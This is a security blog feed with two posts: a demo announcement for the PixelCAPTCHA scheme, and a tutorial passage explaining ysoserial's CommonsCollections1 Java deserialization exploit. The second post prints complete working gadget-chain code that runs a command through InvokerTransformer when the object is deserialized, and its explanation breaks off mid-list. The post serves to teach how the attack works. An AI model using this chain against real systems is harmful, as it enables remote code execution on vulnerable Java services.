tag:blogger.com,1999:blog-46634323004217836512024-02-15T20:33:53.632-08:00Random SecurityGursev Singh Kalrahttp://www.blogger.com/profile/11125392470187170013noreply@blogger.comBlogger23125tag:blogger.com,1999:blog-4663432300421783651.post-82978009826756295052017-07-13T00:01:00.001-07:002017-07-13T00:01:40.282-07:00I Click Therefore I Am - PixelCAPTCHA Demo App<div dir="ltr" style="text-align: left;" trbidi="on">
TL; DR - Everyones hates CAPTCHAs! So do I. But I wrote a new one anyway :p. It's a visual CAPTCHA scheme that can be solved with 2-4 mouse clicks and is named pixelcaptcha.<br />
<br />
Here are the links to a borderline ugly <a href="https://pixelcaptcha.info/" target="_blank">demo web application</a> (I like to think its borderline), a detailed <a href="https://github.com/gursev/whitepapers/blob/master/PixelCAPTCHA_Whitepaper.pdf" target="_blank">white paper</a> (you may like it) and its Java <a href="https://github.com/salesforce/pixel-captcha-project" target="_blank">source code</a> (with gory Maths - you've been warned).<br />
<br />
<span style="font-size: large;">Long Story</span><br />
This post is to talk about a fancy kid in the CAPTCHA town that now happens to have a demo web app for you to play with. It was first demo'ed at BlackHat USA Arsenal. It's source code has been available for a while but I finally got around to creating a demo web app and wanted to share it via this blog so that the security and developer community can play around and share feedback.<br />
<br />
<br />
<span style="font-size: large;">The Demo Web Application</span><br />
To solve a CAPTCHA, you need to find the black characters similar to be blue ones and hit submit. If you accidentally select a wrong character, you can use the 'Clear Selection' button to clear your selection. I should point out that a CAPTCHAs are good only for one use. If you submit wrong solution once, attempts to solve the same CAPTCHA again will result in error message.<br />
<br />
The demo web application has several components to it. It allows you to generate and solve new CAPTCHAs and try out different CAPTCHA configurations. At the backend, the demo application uses the open source CAPTCHA <a href="https://github.com/salesforce/pixel-captcha-project" target="_blank">library</a>.<br />
<br />
When you visit the demo app for the first time, the default CAPTCHA configuration is used, which you can change by providing a new configuration. The default configuration has:<br />
<ul style="text-align: left;">
<li>Horizontal CAPTCHAs</li>
<li>Two challenge characters </li>
<li>Ten response characters to choose from</li>
<li>The characters to draw the CAPTCHA are chosen from 0-255 unicode point range</li>
<li>Unordered solution</li>
</ul>
<div>
The image below shows an example solved CAPTCHA with default configuration.<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjvmN_y-cbm5QgyAJuy3449FSYLdY7MUiTnQXxeVg7S3-wU1JuNES0cRjOO6Q-IkutvbEOxZJ-sI9e8CC4n_TiSUFcZ8VcsqzKRv6pZ5Mzy_SG-6dosH-9IVZbOcNqF1Vv3tkCz5-IKxaaV/s1600/main_screenshot.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="968" data-original-width="1600" height="241" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjvmN_y-cbm5QgyAJuy3449FSYLdY7MUiTnQXxeVg7S3-wU1JuNES0cRjOO6Q-IkutvbEOxZJ-sI9e8CC4n_TiSUFcZ8VcsqzKRv6pZ5Mzy_SG-6dosH-9IVZbOcNqF1Vv3tkCz5-IKxaaV/s400/main_screenshot.png" width="400" /></a></div>
<br />
<br /></div>
<span style="font-size: large;">The Three Control Buttons</span><br />
You will see three buttons under the CAPTCHA image which let you perform the actions as described below:<br />
<br />
<ol style="text-align: left;">
<li><b>New Captcha</b> - The New Captcha button refreshes with a new CAPTCHA for you to try out</li>
<li><b>Submit Solution</b> - Once you are confident that you have solved the CAPTCHA correctly, you can submit the solution to the server for validation. A CAPTCHA solution can be submitted to server only once with the 'Submit Solution' button. Any additional attempts result in an error. </li>
<li><b>Clear Selection</b> - If you have not yet submitted the CAPTCHA solution to the server, you can use this option as many times as you like. When you need to change your solution you can click on this button to clear you solution and reload the same CAPTCHA. This option is useful only if it is exercised before the CAPTCHA solution is submitted to the server.</li>
</ol>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">Message Box</span><br />
The text in the bottom right box displays information about your most recent actions. The text color legend and some example messages are provided below.<br />
<ul style="text-align: left;">
<li><b style="font-weight: bold;"><span style="color: blue;">Blue</span></b> color indicates<b> </b>CAPTCHA configuration updates. The image below shows a CAPTCHA configuration.</li>
</ul>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiG8dqjHWMqx_bfkdMgLm5C-7pBw3r7fBR6vFz_sHLo08c1A0xTJUyCQ_FECiJ0qipMRf0KiFBqHU5HRNiwHGGmb8IrnYHV5AlgHGA0IVsvxzhgap8ctaK_N30IYxkFpxNc3IZZgXicY_JY/s1600/blue_color.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="489" data-original-width="832" height="233" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiG8dqjHWMqx_bfkdMgLm5C-7pBw3r7fBR6vFz_sHLo08c1A0xTJUyCQ_FECiJ0qipMRf0KiFBqHU5HRNiwHGGmb8IrnYHV5AlgHGA0IVsvxzhgap8ctaK_N30IYxkFpxNc3IZZgXicY_JY/s400/blue_color.png" width="400" /></a></div>
<div>
<br /></div>
<ul style="text-align: left;">
<li><b style="font-weight: bold;"><span style="color: #6aa84f;">Green</span></b> color indicates that correct CAPTCHA solution was provided. The image below shows that a correct CAPTCHA solution was provided</li>
</ul>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgykGCiK91L_UCNR2bzANqMW7EDQ0U6U8jXpw_iiPPk0DQtmfD4wIyXfFNGIw0laXqGIoOT0iaf_oUw9cVv4gjwGPA-0ofEzIMtvaEBw6JS6ZYD46bQ-decwImOigZ6aAle8Tqu4r8Opmay/s1600/green_color.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="424" data-original-width="840" height="201" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgykGCiK91L_UCNR2bzANqMW7EDQ0U6U8jXpw_iiPPk0DQtmfD4wIyXfFNGIw0laXqGIoOT0iaf_oUw9cVv4gjwGPA-0ofEzIMtvaEBw6JS6ZYD46bQ-decwImOigZ6aAle8Tqu4r8Opmay/s400/green_color.png" width="400" /></a></div>
<div style="font-weight: bold;">
<br /></div>
<ul style="text-align: left;">
<li><b style="font-weight: bold;"><span style="color: red;">Red</span></b> color indicates that in correct CAPTCHA solution was provided. The image below shows that the CAPTCHA solution that was provided was for a CAPTCHA ID that has either expired or is not present.</li>
</ul>
<ol style="text-align: left;">
</ol>
<div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhEe679tdpnHivVEYS3McLXcij3964_Gj0Vkf3yBASk-sAvQeFKdR-WKZkkIe00NZX5zpAOFiKXuPzOjM4-c0MRA5pDiaahbGlkbK6F1DnbSbQhgGZVEQVkP6ngfZHCrPS8FdhuQM_7NxBr/s1600/red_color.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="383" data-original-width="834" height="182" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhEe679tdpnHivVEYS3McLXcij3964_Gj0Vkf3yBASk-sAvQeFKdR-WKZkkIe00NZX5zpAOFiKXuPzOjM4-c0MRA5pDiaahbGlkbK6F1DnbSbQhgGZVEQVkP6ngfZHCrPS8FdhuQM_7NxBr/s400/red_color.png" width="400" /></a></div>
<br /></div>
<div>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">Different CAPTCHA Configurations</span><br />
When you select a new value from any dropdown, a new CAPTCHA configuration will be set on the server and the on-screen CAPTCHA will be refreshed with the new configuration. The instructions at the top of the page are also updated based on the challenge character count. I'll briefly explain different configuration options that you can try out on the <a href="https://pixelcaptcha.info/">demo application</a>.<br />
<br />
<ol style="text-align: left;">
<li><b>Challenge Count</b> - Changing this value sets the total number of challenge characters. It can take 2, 3 or 4 as a valid value. For example, if you set it to 4, you will see 4 blue characters and you will need to choose four black characters similar to the blue challenge characters.</li>
<li><b>Response Count - </b>Changing this value set the total number of response characters to choose from. It can take 10, 11 or 12 as a valid value.</li>
<li><b>CAPTCHA Orientation</b> - You can generate vertical or horizontal CAPTCHAs for different type of target screens. A vertical CAPTCHA may be more suitable for the mobile devices, a horizontal CAPTCHA may be more suitable for desktops.</li>
<li><b>Unicode Code Point Range</b> - This allows you to provide the unicode character range to choose from. The default value is 0-255. However, you can choose 0-4095 or 0-65535 to use larger character space to pick and use for CAPTCHA challenge and response characters from. The <a href="https://github.com/salesforce/pixel-captcha-project">library</a> allows you to provide comma separated arbitrary code points.</li>
<li><b>Ordered Clicks</b> - When set to true, the CAPTCHA solution should follow the order in which the challenge characters appear in the CAPTCHA. For horizontal CAPTCHA, find the topmost challenge character among the response characters and click on it first, then move to the second from top, and so on. For vertical CAPTCHA, find the leftmost challenge character among the response characters and click on it, and so on.</li>
</ol>
<div>
<span style="font-size: large;"><br /></span></div>
<div>
<span style="font-size: large;">A Few Example CAPTCHAs and The Corresponding Configuration</span></div>
<div>
<ul style="text-align: left;">
<li>Image shows a horizontal CAPTCHA with 4 challenge characters, 10 response characters and unicode character range 0-4095</li>
</ul>
</div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhh5Do6fwuDnmYZ4Vil0kvZEJBRtzN5zUVX_pdD0hnBtbCnJRIKIbVPoz4E1u30koV1b1y10DC1YwNcZ_zHYc2fD0l0Y95UfWSG8-Qdgz-69Ktc9XZBq1X7UUtxZsEXLoLf4ceSUmY-kd8u/s1600/horizontal_0-4095_4x10.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="767" data-original-width="1600" height="191" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhh5Do6fwuDnmYZ4Vil0kvZEJBRtzN5zUVX_pdD0hnBtbCnJRIKIbVPoz4E1u30koV1b1y10DC1YwNcZ_zHYc2fD0l0Y95UfWSG8-Qdgz-69Ktc9XZBq1X7UUtxZsEXLoLf4ceSUmY-kd8u/s400/horizontal_0-4095_4x10.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><br /></td></tr>
</tbody></table>
<ul>
<li>Image shows a vertical CAPTCHA with 2 challenge characters, 10 response characters and unicode character range 0-4095</li>
</ul>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjgUoSeUago4n6zrtZ3JdqJep5AwPCKtL9QlE3rEsSPhy_Y6vN_jEgs7bdAvdoV0IHluECMSdu32IQOY-g6tdho727urXdOpaieWQmIvNd4qfLdMbnL-IorxqYmn0nXv7r0xWwE8EPXTiti/s1600/vertical_0-4095_2x10.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="795" data-original-width="1600" height="198" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjgUoSeUago4n6zrtZ3JdqJep5AwPCKtL9QlE3rEsSPhy_Y6vN_jEgs7bdAvdoV0IHluECMSdu32IQOY-g6tdho727urXdOpaieWQmIvNd4qfLdMbnL-IorxqYmn0nXv7r0xWwE8EPXTiti/s400/vertical_0-4095_2x10.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div>
<ul>
<li>Image shows a CAPTCHA with 4 challenge characters, 12 response characters to choose from and unicode character range 0-65535</li>
</ul>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEghdCQgGw2Uw3EysibzrfaiM7vslHOB-RSKZgVHGIMLZtYhyphenhyphenZ1L9UGg0dbBYKIHPjTSoc3o8wgJYr7P5FTVr8CE_Z-9GSTPQKApx0xJVU6JwYjMJhZNkabi73MmOcAucphNHU467PoM68AW/s1600/horizontal_0-65535_4x12.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="743" data-original-width="1600" height="185" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEghdCQgGw2Uw3EysibzrfaiM7vslHOB-RSKZgVHGIMLZtYhyphenhyphenZ1L9UGg0dbBYKIHPjTSoc3o8wgJYr7P5FTVr8CE_Z-9GSTPQKApx0xJVU6JwYjMJhZNkabi73MmOcAucphNHU467PoM68AW/s400/horizontal_0-65535_4x12.png" width="400" /></a></div>
<ul></ul>
</div>
<div>
<br /></div>
<div>
I'll be looking forward for your feedback. Please feel free to leave feedback here, log bugs on GitHub or directly reach out to me. Thank you!</div>
</div>
<br /></div>
Gursev Singh Kalrahttp://www.blogger.com/profile/11125392470187170013noreply@blogger.com1tag:blogger.com,1999:blog-4663432300421783651.post-87852526764893472852016-01-01T15:59:00.002-08:002016-01-02T13:05:05.865-08:00Understanding ysoserial's CommonsCollections1 exploit<div dir="ltr" style="text-align: left;" trbidi="on">
Last year, <a href="https://github.com/frohoff/ysoserial" target="_blank">ysoserial</a> was released by <a href="https://twitter.com/frohoff" target="_blank">frohoff</a> and <a href="https://twitter.com/gebl" target="_blank">gebl</a>. It is a fantastic piece of work. The tool provides options to generate several different types of serialized objects, which when deserialized, can result in arbitrary code execution if the right classes are present in the classpath. In this blog post, I will discuss the <a href="https://github.com/frohoff/ysoserial/blob/master/src/main/java/ysoserial/payloads/CommonsCollections1.java%22" target="_blank">CommonsCollections1</a> exploit, and its working, available in the ysoserial toolkit.<br />
<br />
<b>All code snippets used in this post are sourced from ysoserial</b><br />
<br />
<b><span style="font-size: large;">An Overview</span></b><br />
The CommonsCollections1 exploit builds a custom AnnotationInvocationHandler object that contains an InvokerTransformer (Apache Commons Collections class) payload, and outputs the serialized object. When the serialized object is deserialized, the code path from AnnotationInvocationHandler's readObject leads to InvokerTransformer's payload, causing code execution.<br />
<br />
The image below shows the custom AnnotationInvocationHandler object used for RCE.<br />
<br />
<br />
<img border="0" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgEGEDkdm7jJ1DHv4d1BI3g_eOUYAnXaLockpkp8ZpwulwYEZZaoc842xxQ4Elu76OQ8Isr_z5ATfnuUnWoWCFMMhyphenhyphen0zTLItZiVzST0l7n5X4NYr4Fj0y-hsVhEonZ6Usy_8kZ_CC5iBR7K/s400/Serialized_Object_Structure.png" width="400" /><br />
Image 1: The serialized AnnotationInvocationHandler<br />
<br />
<br />
What makes the exploit effective is that it only relies on the classes present in Java and Apache Commons Collections. The CommonsCollections1 leverages following classes from JDK and Commons Collections.<br />
<br />
<b>From JDK</b><br />
<br />
<ol style="text-align: left;">
<li>AnnotationInvocationHandler</li>
<li>Proxy</li>
<li>Map</li>
<li>Override</li>
<li>InvocationHandler</li>
<li>Runtime</li>
</ol>
<br />
<br />
<b>From Commons Collections:</b><br />
<br />
<ol style="text-align: left;">
<li>LazyMap</li>
<li>Transformer</li>
<li>ChainedTransformer</li>
<li>InvokerTransformer</li>
</ol>
<br />
<br />
So, as long a Java software stack contains Apache commons Collections library (<= 3.2.1), it will be vulnerable to remote code execution attacks while deserializing untrusted objects.<br />
<br />
<br />
<span style="font-size: large;"><b>Pre-requisites</b></span><br />
It will be helpful to refer to the following Classes and concepts as we work our way to understanding the exploit.<br />
<ol>
<li>Java Serialization and Deserialization mechanisms</li>
<li><a href="https://docs.oracle.com/javase/7/docs/api/java/io/ObjectInputStream.html" target="_blank">ObjectInputStream</a> - including readObject()</li>
<li><a href="https://docs.oracle.com/javase/8/docs/technotes/guides/reflection/proxy.html" target="_blank">Proxy</a></li>
<li><a href="http://www.concretepage.com/java/dynamic-proxy-with-proxy-and-invocationhandler-in-java" target="_blank">InvocationHandler</a></li>
<li><a href="https://www.safaribooksonline.com/library/view/jakarta-commons-cookbook/059600706X/ch04s11.html" target="_blank">Transformer</a></li>
<li><a href="https://www.safaribooksonline.com/library/view/jakarta-commons-cookbook/059600706X/ch05s19.html" target="_blank">LazyMap</a></li>
<li><a href="https://www.safaribooksonline.com/library/view/jakarta-commons-cookbook/059600706X/ch04s12.html" target="_blank">ChainedTransformer</a></li>
<li><a href="http://grepcode.com/file/repository.springsource.com/org.apache.commons/com.springsource.org.apache.commons.collections/3.2.1/org/apache/commons/collections/functors/InvokerTransformer.java" target="_blank">InvokerTransformer</a> - Instances of this class were used to perform code execution and we will discuss this in more details below.</li>
</ol>
Since InvokerTransformer class is the eventual sink that performs code execution, lets us take a closer look at it. An InvokerTransformer constructor takes three parameters:<br />
<ol style="text-align: left;">
<li>Name of the method</li>
<li>parameter types the method accepts</li>
<li>Parameters values</li>
</ol>
An InvokerTransformer instance accepts an object as input and outputs the transformed object. The transformation is determined by the instantiation parameters. The InvokerTransformer first finds a method with the method name (specified as first parameter) that accepts the given parameters types (specified as second parameter) on the incoming object. Upon finding a matching method, the method on the incoming object and the parameter values from (3) as passed as arguments into the method. The returned value is the value of the method execution.<br />
<br />
<img border="0" height="76" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhHwHzEPQuEpoVP3-AX1AK8mwbxgqJC5sNd9QncouGc6s7DjpH2ZvOSwRfFwWHjOb0H21HLP5L2dIJ2MtN6oc4Zy71uOhPcJ_2o5PUcREUGwDrxIBKJGMdZ1U4PDpg6Tvlp1aTj47eOS1UJ/s400/InvokerTransformer.png" width="400" /><br />
Image 2: Shows InvokerTransformer<br />
<br />
<br />
<span style="font-size: large;"><b>Payload Only Execution</b></span><br />
<br />
Assuming you understand how Transformers, ChainedTransformers and LazyMaps work, we will look at CommonsCollection1's payload only execution using a ChainedTransformer. When you run the class below , it will open a calculator on a Mac.<br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>public class CommonsCollections1PayloadOnly {</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b> public static void main(String... args) {</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b> String[] command = {"open -a calculator"};</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b> final Transformer[] transformers = new Transformer[]{</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b> new ConstantTransformer(Runtime.class), <span style="color: blue;">//(1)</span></b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b> new InvokerTransformer("getMethod",</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b> new Class[]{ String.class, Class[].class},</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b> new Object[]{"getRuntime", new Class[0]}</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b> ), <span style="color: blue;">//(2)</span></b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b> new InvokerTransformer("invoke",</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b> new Class[]{Object.class, Object[].class},</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b> new Object[]{null, new Object[0]}</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b> ), <span style="color: blue;">//(3)</span></b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b> new InvokerTransformer("exec",</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b> new Class[]{String.class},</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b> command</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b> ) <span style="color: blue;">//(4)</span></b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b> };</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b> ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b> Map map = new HashMap<>();</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b> Map lazyMap = LazyMap.decorate(map, chainedTransformer);</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b> lazyMap.get("gursev");</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b> }</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>}</b></span><br />
<br />
The image below shows the execution flow when the chainedTransformer in the code snippet above is executed while setting a value on the lazyMap. The number in braces correspond to the individual Transformer execution in the code snippet above.<br />
<br />
<br />
<br />
<br />
<img border="0" height="80" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqTmHsGUMIB-hcZaQhnt8wBS6n-28zBHvUvWv3TyoGaG_DnIyZ5crxsJjkwpjiNmTNPxV1MghAp_O80SBQqJttPW1kg7RZZmtiHI0vQ1r5X3armLGBLr1F2pMWUD03uPm1kt9yOi5Q2_ef/s400/InvokerTransformer-3.png" width="400" /><br />
Image 3: Shows chainedTransfomer invocation when a value is set on the LazyMap<br />
<br />
<br />
<b><span style="font-size: large;">Putting it all together</span></b><br />
<br />
The code below performs both serialization and deserialization. It also executes the command to open a calculator during the deserialization process.<br />
<ol>
<li>The getEvilObject creates a Java Object that can arbitrary code when deserialized. The object structure is provided in Image 1</li>
<li>The serializeToByteArray method serializes the evilObject to a byte array</li>
<li>The deserializeFromByteArray deserializes the object from the binary array. If Apache CommonsCollections library (<=3.2.1) is present in the classpath, the command also gets executed.</li>
</ol>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>public class CommonsCollections1All {</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b><br /></b></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b> public static void main(String... args) throws ClassNotFoundException, IllegalAccessException, InvocationTargetException, InstantiationException, IOException {</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b> Object evilObject = getEvilObject();</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b> byte[] serializedObject = serializeToByteArray(evilObject);</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b> deserializeFromByteArray(serializedObject);</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b> }</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b><br /></b></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b> public static Object getEvilObject() throws ClassNotFoundException, IllegalAccessException, InvocationTargetException, InstantiationException {</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b><br /></b></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b> String[] command = {"open -a calculator"};</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b><br /></b></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b> final Transformer[] transformers = new Transformer[]{</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b><br /></b></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b> new ConstantTransformer(Runtime.class),</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b><br /></b></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b> new InvokerTransformer("getMethod",</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b> new Class[]{ String.class, Class[].class},</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b> new Object[]{"getRuntime", new Class[0]}</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b> ),</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b><br /></b></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b> new InvokerTransformer("invoke",</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b> new Class[]{Object.class, Object[].class},</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b> new Object[]{null, new Object[0]}</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b> ),</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b><br /></b></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b> new InvokerTransformer("exec",</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b> new Class[]{String.class},</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b> command</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b> )</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b> };</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b><br /></b></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b> ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b><br /></b></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b> Map map = new HashMap<>();</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b> Map lazyMap = LazyMap.decorate(map, chainedTransformer);</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b><br /></b></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b> String classToSerialize = "sun.reflect.annotation.AnnotationInvocationHandler";</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b> final Constructor<?> constructor = Class.forName(classToSerialize).getDeclaredConstructors()[0];</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b> constructor.setAccessible(true);</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b> InvocationHandler secondInvocationHandler = (InvocationHandler) constructor.newInstance(Override.class, lazyMap);</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b> Proxy evilProxy = (Proxy) Proxy.newProxyInstance(CommonsCollections1All.class.getClassLoader(), new Class[] {Map.class}, secondInvocationHandler );</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b><br /></b></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b> InvocationHandler invocationHandlerToSerialize = (InvocationHandler) constructor.newInstance(Override.class, evilProxy);</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b> return invocationHandlerToSerialize;</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b><br /></b></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b> }</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b><br /></b></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b> public static void deserializeAndDoNothing(byte[] byteArray) throws IOException, ClassNotFoundException {</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b> ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(byteArray));</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b> ois.readObject();</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b> }</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b><br /></b></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b> public static byte[] serializeToByteArray(Object object) throws IOException {</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b> ByteArrayOutputStream serializedObjectOutputContainer = new ByteArrayOutputStream();</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b> ObjectOutputStream objectOutputStream = new ObjectOutputStream(serializedObjectOutputContainer);</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b> objectOutputStream.writeObject(object);</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b> return serializedObjectOutputContainer.toByteArray();</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b> }</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b><br /></b></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b> public static Object deserializeFromByteArray(byte[] serializedObject) throws IOException, ClassNotFoundException {</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b> ByteArrayInputStream serializedObjectInputContainer = new ByteArrayInputStream(serializedObject);</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b> ObjectInputStream objectInputStream = new ObjectInputStream(serializedObjectInputContainer);</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b> InvocationHandler evilInvocationHandler = (InvocationHandler) objectInputStream.readObject();</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b> return evilInvocationHandler;</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b> }</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>}</b></span><br />
<br />
<br />
<br />
The code path flow leading to code execution is discussed below and is also summarized in image 4.<br />
<br />
<ol style="text-align: left;">
<li>The ObjectInputStream calls the readObject() method</li>
<li>On method invocation, the JVM looks for the serialized Object's class in the classpath. If the class is not found, ClassNotFoundException is thrown. If the class is found, readObject() method of the identified class (AnnotationInvocationHandler) is invoked. This process is followed for all types of objects that get serialized with the CommonsCollections1 payload.</li>
<li>The readObject method inside the AnnotationInvocationHandler invokes entrySet method on the MapProxy.</li>
